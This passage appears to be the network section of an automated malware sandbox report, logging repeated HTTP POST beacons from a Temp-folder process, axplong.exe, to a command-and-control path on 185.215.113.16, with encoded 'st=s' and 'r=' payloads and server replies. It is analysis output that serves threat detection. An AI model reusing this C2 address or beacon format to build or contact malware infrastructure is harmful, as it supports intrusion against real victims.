                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.665079185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:24.312181950 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:25.010644913 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:25.011596918 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:25.251305103 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:25 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.665080185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:25.372445107 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:26.080391884 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:25 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:26.081221104 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:26.311265945 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.665081185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:26.419950962 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:27.127243996 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:27.128163099 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:27.357180119 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.665082185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:27.466196060 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:28.160341978 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:28.161339045 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:28.385201931 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.665083185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:28.497158051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:29.205689907 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:29.206495047 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:29.434858084 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.665084185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:29.545265913 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:30.236643076 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:30.255404949 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:30.479671955 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.665085185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:30.593281031 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:31.315900087 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:31.316760063 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:31.546283960 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.665086185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:31.654573917 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:32.382282019 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:32.383268118 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:32.614095926 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.665087185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:32.734601974 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:33.427792072 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:33.428626060 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:33.657365084 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.665088185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:33.778311968 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:34.510302067 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:34.511203051 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:34.742978096 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.665089185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:34.856751919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:35.597928047 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:35.599411011 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:35.837348938 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
